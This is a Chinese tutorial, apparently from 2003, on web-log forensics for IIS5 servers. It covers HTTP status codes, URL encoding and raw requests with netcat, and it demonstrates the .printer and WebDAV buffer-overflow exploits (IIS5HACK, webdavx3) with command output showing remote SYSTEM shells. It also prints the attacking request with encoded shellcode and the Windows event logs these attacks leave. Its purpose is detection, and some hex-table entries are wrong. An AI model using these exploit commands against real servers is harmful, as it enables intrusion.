这里举的例子是请求一个目录,请求一个文件也是一样的,比如说我们请求的是:
http://www.chinaload.com/download/index.html
在服务器看来是:
GET /download/index.html HTTP/1.1
如果这个文件是存在的,而且服务器运行正常,那么服务器就会返回index.html
的数
据,并通过浏览器对数据的解析,呈现出我们平时看到的
页面,在成功的获取了文件的数据的情况下,服务器会产生HTTP 200 OK
的应答记
录。如果这个文件不存在就会产生404 notfound
,如果权限
不够就会产生
403
access
denied,
其他的HTTP
常见应答代码还包括:
202 Accepted
已经接受请求,但处理尚未完成;
301 Moved Permanently
客户请求的文档在其他地方,新的URL
在Location
头中给出,
浏览器应该自动地访问新的URL
;
401 Unauthorized
客户试图未经授权访问受密码保护的页面。应答中会包含一个
WWW-Authenticate
头,浏览器据此显示用户名字/
密码对话框
,然后在填写合适的Authorization
头后再次发出请求;
414 Request URI Too Long URI
太长;
500 Internal Server Error
服务器遇到了意料不到的情况,不能完成客户的请求。
如果想得到一份完整的HTTP
应答代码列表,可以在GOOGLE
里搜索,网络上很多地方可以
提供该列表。
知识点之二:URL
的十六进制编码
HTTP
在URL
的请求中允许使用十六进制编码来代替输入的ASCII
字符。
常用的ASCII
字符和十六进制编码的对应表:
ASCII
十六进制编码
/
正斜线
%2F
/
反斜线
%5C
空格
%20
+
加号
%2B
.
句点
%2E
?
问号
%3C
:
冒号
%3A
例如:对于www.bbs.com/data
下的“BAK DATA FILE.DBA
”的十六进制表达方式就是:
http://www.bbs.com/data/bak%20data%20file.dba
知识点之三:netcat
的使用
netcat
有”网络瑞士军刀“之称,我们在这里主要介绍一下它在WEB
攻击中的应用。
首先,netcat
允许原始的HTTP
输入,这与IE
等浏览器不同,IE
浏览器会删除额外的输
入,例如“../../
”,这会禁止部分遍历攻击。
其次,netcat
也允许原始的HTTP
输出,这样得到的服务器应答将会更全面、更细致,而
浏览器则只会显示HTML
那些在源码里注释过的内容,忽
略了更重要的信息。
下面我们来看一个例子:
Microsoft Windows [
版本
5.2.3790]
(C)
版权所有
1985-2003 Microsoft Corp.
C:/Documents and Settings/Administrator>e:
E:/>
E:/>nc -vv 192.168.0.100 80
192.168.0.100: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.100] 80 (http) open
get / http/1.1
HTTP/1.1 400 Bad Request
Server: Microsoft-IIS/5.0
Date: Mon, 15 Dec 2003 03:51:30 GMT
Content-Type: text/html
Content-Length: 87
<html><head><title>Error</title></head><body>The parameter is incorrect.
</body>
</html>sent 16, rcvd 224: NOTSOCK
E:/>
我们可以看到建立了连接以后,目标会告诉我们80
端口开放,然后我们输入
get /
http/1.1
来请求WWWROOT
里的默认文件,回车。
于是原始的HTTP
应答便完整的显示在了屏幕上,包括IIS
的类型和完整的脚本输出。
如果为了节省时间,提高速度,可以将需要输入的内容事先作成一个TXT
文本,比如说
文件名是1.txt
,然后使用
E:/>nc -vv 192.168.0.100 80 < 1.txt
可以得到相同的返回内容。
更多的有趣内容可以通过nc -h
命令了解到,需要注意的一点是:netcat
不能连接到被
SSL
保护的WEB
服务器。
目前最有威胁的IIS5
攻击有两种,一种是IIS5
缓冲区溢出,另外的一种是IIS
拒绝服
务。
IIS5
缓冲区溢出
我曾经粗略做了一个统计,WINDOWS
涉及到溢出的漏洞稍微多于LINUX
,而WINDOWS
的大
量的溢出漏洞与IIS
有关,所以没有IIS
的WINDOWS
的整体
安全性绝对要高于LINUX
,这几句话涉及到了WINDOWS
与LINUX
之争,所以就不再多说
了,免得又引起无谓的“口水战”。
熟悉缓冲区溢出攻击必须对溢出的工作方式有所了解,由于本身溢出就是一个很大的课
题,所以我们只简单的介绍一下:如果一个程序没有限
制输入的字符长度或者检查输入长度是否正确,就会发生溢出。一个没有进行限制的输
入就有可能因为输入长度的问题“溢出”到CPU
运行栈的
另一部分去,如果这个输入被精心的设计过,那么它可以被用来运行指定的代码。而
IIS
运行的帐户环境是SYSTEM
,所以通过溢出得到的是
SYSTEM
权限,而SYSTEM
权限是系统内的最高技术权限,因此IIS
缓冲区溢出造成的灾难
往往是致命的。
IPP
缓冲区溢出
这个漏洞比较早了,但是一直私下里认为这是一个很典型的IIS
溢出漏洞攻击,所以又
翻了出来,这个漏洞存在于处理.printer
文件的ISAPI
过
滤器(c:/winnt/system32/msw3prt.dll
),
它为WIN2000
提供INTERNET
打印协议,即
IPP
的支持,可实现对网络打印机的基于WEB
的控制,
在.printer ISAPI
请求中,在HTTP HOST
:头中发送420
字节的缓冲区,就会发生溢出,
如下:
GET /NULL.PRINTER HTTP/1.0
HOST
: [BUFFER
为420
个字符
]
发生溢出后IIS
异常终止,但是为了2000
为了保障WEB
的弹性运行,这时会自动重新运行
IIS
(inetinfo.exe
),
在后面提供的日志里你可以充分
的注意到这一点。
互联网上流行的最成功的一个IPP
漏洞利用工具是IIS5HACK
,不过最近的这个工具的版
本好象都被加了木马。
操作如下:
E:/>iis5hack 192.168.0.87 80 0 1256
iis5 remote .printer overflow. writen by sunx
http://www.sunx.org
for test only, dont used to hack, :p
connecting...
sending...
checking...
Now you can telnet to 1256 port
good luck :)
E:/>
这时使用“telnet 192.168.0.87 1256
”就可以连接到目标
服务器
上,我们可以看到目
标
服务器
系统装在H
盘上。
http://www.sunx.org
Microsoft Windows 2000 [Version 5.00.2195]
(C)
版权所有
1985-1998 Microsoft Corp.
H:/WINNT/system32>
在这个过程里,IIS
日志里一般不会出现记录,但是在事件查看器里的系统日志项目里
将会出现IIS
各个组建停止的信息,安全项目里也将出现
以下的日志:
事件类型:
成功审核
事件来源
: Security
事件种类:
系统事件
事件
ID: 515
日期
: 2003-12-16
事件
: 15:34:13
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。
登录过程名
: /inetinfo.exe
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 577
日期
: 2003-12-16
事件
: 15:34:13
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
调用的特许服务
:
服务器
: NT Local Security Authority / Authentication Service
服务
: LsaRegisterLogonProcess()
主要用户名
: 123-DK8KIFN4NZR$
主要域
: SERVER
主要登录
ID: (0x0,0x3E7)
客户端用户名
: 123-DK8KIFN4NZR$
客户端域
: SERVER
客户端登录
ID: (0x0,0x3E7)
特权
: SeTcbPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
帐户登录
事件
ID: 680
日期
: 2003-12-16
事件
: 15:34:13
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
为登录所用的帐户
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名
:
IUSR_123-DK8KIFN4NZR
工作站
:
123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
登录/
注销
事件
ID: 540
日期
: 2003-12-16
事件
: 15:34:13
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
成功的网络登录
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x17FBA)
登录类型
: 3
登录过程
: IIS
身份验证程序包
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
工作站名
: 123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 576
日期
: 2003-12-16
事件
: 15:34:13
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
指派给新登录的特殊权限
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x17FBA)
已指派
: SeChangeNotifyPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 15:34:57
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4282631840
映象文件名
: /WINNT/system32/dllhost.exe
创建者过程
ID: 2258146112
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 15:34:58
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4280877088
映象文件名
: /WINNT/system32/cmd.exe
创建者过程
ID: 4285625728
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
从上面我们可以看出,在判断溢出攻击的时候,仅仅靠WEB
日志还是不够的,因为在发
生溢出的时候,IIS
多半已经被停止了,无法提供给我们
更多的线索,需要更好的对攻击进行分析的话,需要我们多方位的入手。
WebDAV
远程缓冲区溢出漏洞
WebDAV
是 HTTP
规范的行业标准扩展。“WebDAV
”中的“DAV
”代表“分布式创作和版
本控制”。WebDAV
为授权用户提供了在
Web
服务器
上
远程添加和管理内容的能力。IIS5
默认提供了对WebDAV
的支持,通过WebDAV
可以通过
HTTP
向用户提供远程文件存储的服务。但是作为普通的
HTTP
服务器
,这个功能没有必要。
IIS5
包含的WebDAV
组件不充分检查传递给部分系统组件的数据,远程攻击者利用这个漏
洞对WebDAV
进行缓冲区溢出攻击,可能以WEB
进程权限在
系统上执行任意指令。IIS 5.0
的WebDAV
使用了ntdll.dll
中的一些函数,而这些函数存
在一个缓冲区溢出漏洞。通过对WebDAV
的畸形请求可以
触发这个溢出。成功利用这个漏洞可以获得LocalSystem
权限。这意味着,入侵者可以
获得主机的完全控制能力。任何能够将 WebDAV
请求传输
到受影响的 Web
服务器的用户都可以尝试利用此弱点。由于 WebDAV
请求是在
HTTP
所在的同一端口(通常是端口 80
)上传输,这实质上意
味着任何能够与受影响的服务器建立连接的用户都可以尝试利用此弱点。
网络上WebDAV
攻击工具非常的多,使用也很简单,所以造成了前一段时间WEBDAV
攻击泛
滥,
其中最著名的是WEBDAVX3
,需要注意的是这个程序是有时间期限的,但是可以通过调整
系统时间的方法解决,比如说将时间调回2002
年,这并不会影响这个程序的使用。
C:/>webdavx3 192.168.0.1
IIS WebDAV overflow remote exploit by isno@xfocus.org
start to try offset,
if STOP a long time, you can press ^C and telnet 192.168.0.1 7788
try offset: 0
try offset: 1
try offset: 2
try offset: 3
try offset: 4
try offset: 5
try offset: 6
try offset: 7
try offset: 8
try offset: 9
try offset: 10
try offset: 11
try offset: 12
try offset: 13
try offset: 14
try offset: 15
try offset: 16
try offset: 17
try offset: 18
try offset: 19
try offset: -1
try offset: -2
try offset: -3
waiting for iis restart.......................
(IIS
正在重起)
try offset: -4
在这一时候计算机会有一段长时间停止,只需要使用^C
短开,就可以使用NC
或者
TELNET
连上去了。
C:/>nc -vv 192.168.0.1 7788
192.168.0.1: inverse host lookup failed: h_errno 11004: NO_DATA
(UNKNOWN) [192.168.0.1] 7788 (?) open
Microsoft Windows 2000 [Version 5.00.2195]
(C)
版权所有
1985-2000 Microsoft Corp.
C:/WINNT/system32>
以下是遭到WEBDAV
溢出攻击后的WEB
日志主要特征:
2003-12-16 05:51:38 192.168.0.235 - 192.168.0.87 80 LOCK
/AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA
AAAAAAAAAAAAAAAAA
契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契桘杲楜契
桘杲楜厐晞暭餽畠囸噖晟暭丽琀連愬傐晙邭愬咍炈咍邊咍
炊咍邊塒璪痘郖偘偐郃悙
ffilomidomfafdfgfhinhnlaljbeaaaaaalimmmmmmmmpdklojieaaaaaaipefpainlnpepppppp
gekbaaaaaaaaijehaigeijdnaaaaaaaamhefpeppppppppile
fpaidoiahijefpiloaaaabaaaoideaaaaaaibmgaabaaaaaolagibmgaaeaaaaailagdneoeoeoe
ohfpbidmgaeikagegdmfjhfpjikagegdmfihfpcggknggdnfj
fihfokppogolpofifailhnpaijehpcmdileeceamafliaaaaaamhaaeeddccbbddmamdolomoihh
ppppppcecececeNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN
NNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNNN -
400 -
在事件查看器里的系统日志项目里将会出现IIS
各个组件停止的信息,安全项目里也将
出现
以下的日志:
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:02
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4281625184
映象文件名
: /WINNT/system32/iisreset.exe
创建者过程
ID: 2171497184
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:03
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 2276659232
映象文件名
: /WINNT/system32/inetsrv/iisrstas.exe
创建者过程
ID: 2244638496
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:03
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4274700320
映象文件名
: /WINNT/system32/inetsrv/inetinfo.exe
创建者过程
ID: 2171497184
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 577
日期
: 2003-12-16
事件
: 13:52:03
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
调用的特许服务
:
服务器
: NT Local Security Authority / Authentication Service
服务
: LsaRegisterLogonProcess()
主要用户名
: 123-DK8KIFN4NZR$
主要域
: SERVER
主要登录
ID: (0x0,0x3E7)
客户端用户名
: 123-DK8KIFN4NZR$
客户端域
: SERVER
客户端登录
ID: (0x0,0x3E7)
特权
: SeTcbPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 593
日期
: 2003-12-16
事件
: 13:52:10
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经退出某过程
:
过程
ID: 832
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 593
日期
: 2003-12-16
事件
: 13:52:16
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经退出某过程
:
过程
ID: 980
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
事件类型:
成功审核
事件来源
: Security
事件种类:
系统事件
事件
ID: 515
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
受信任的登录过程已经在本地安全机制机构注册。 将信任这个登录过程来提交登录申
请。
登录过程名
: /inetinfo.exe
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 577
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
调用的特许服务
:
服务器
: NT Local Security Authority / Authentication Service
服务
: LsaRegisterLogonProcess()
主要用户名
: 123-DK8KIFN4NZR$
主要域
: SERVER
主要登录
ID: (0x0,0x3E7)
客户端用户名
: 123-DK8KIFN4NZR$
客户端域
: SERVER
客户端登录
ID: (0x0,0x3E7)
特权
: SeTcbPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
帐户登录
事件
ID: 680
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
为登录所用的帐户
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
帐户名
:
IUSR_123-DK8KIFN4NZR
工作站
:
123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
登录/
注销
事件
ID: 540
日期
: 2003-12-16
事件
: 13:52:25
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
成功的网络登录
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x1D0EFE)
登录类型
: 3
登录过程
: IIS
身份验证程序包
: MICROSOFT_AUTHENTICATION_PACKAGE_V1_0
工作站名
: 123-DK8KIFN4NZR
事件类型:
成功审核
事件来源
: Security
事件种类:
特权使用
事件
ID: 576
日期
: 2003-12-16
事件
: 13:52:25
用户
: 123-DK8KIFN4NZR/IUSR_123-DK8KIFN4NZR
计算机
: 123-DK8KIFN4NZR
描述
:
指派给新登录的特殊权限
:
用户名
: IUSR_123-DK8KIFN4NZR
域
: 123-DK8KIFN4NZR
登录
ID: (0x0,0x1D0EFE)
已指派
: SeChangeNotifyPrivilege
事件类型:
成功审核
事件来源
: Security
事件种类:
详细追踪
事件
ID: 592
日期
: 2003-12-16
事件
: 13:52:25
用户
: NT AUTHORITY/SYSTEM
计算机
: 123-DK8KIFN4NZR
描述
:
已经创建新的过程
:
新的过程
ID: 4276928544
映象文件名
: /WINNT/system32/cmd.exe
创建者过程
ID: 4274700320
用户名
: 123-DK8KIFN4NZR$
域
: SERVER
登录
ID: (0x0,0x3E7)
需要注意的是,在WEBDAV
溢出的过程中IIS
会产生多次重复启动,而在WEB
的日志里并不
能看出这一点,而这一点在事件查看器里的系统日志里和安全日志里都可以清楚的看
到。
关于WEBDAV
的防范措施与本主题无关,且网络上很多地方提供了,就不赘述了。
内容来自用户分享和网络整理,不保证内容的准确性,如有侵权内容,可联系管理员处理 
相关文章推荐
- 用LogParser对IIS 日志进行分析
- 日志文件分析工具—AWStats在IIS中的配置步骤
- AWStats简介:Apache/Windows IIS的日志分析工具的下载,安装,配置样例和使用
- 定时自动备份IIS的WWW日志的vbs脚本
- IIS 6 惊现 WebDAV 漏洞攻击
- IIS-logfiles详解以及日志日期问题
- iis错误日志对应的站点如何查看
- IIS部署日志站点时出现的UTF8文件乱码问题及解决
- IIS 日志乱码!
- 【UNET自学日志】Part15 僵尸攻击玩家
- IIS 网站日志分析
- spark大数据平台shell脚本分析攻击日志
- IIS W3C日志记录字段和HTTP状态代码的说明<转>
- web攻击日志分析之新手指南
- 使用LogParser分析IIS网站日志
- log parser 微软iis 日志分析
- 细说IIS异常日志 — 你必须知道的功能
- iis 日志 -Windows2003/XP上AWstats安装教程
- IIS W3C日志记录字段和HTTP状态代码
- Web攻击日志分析的过去现在与未来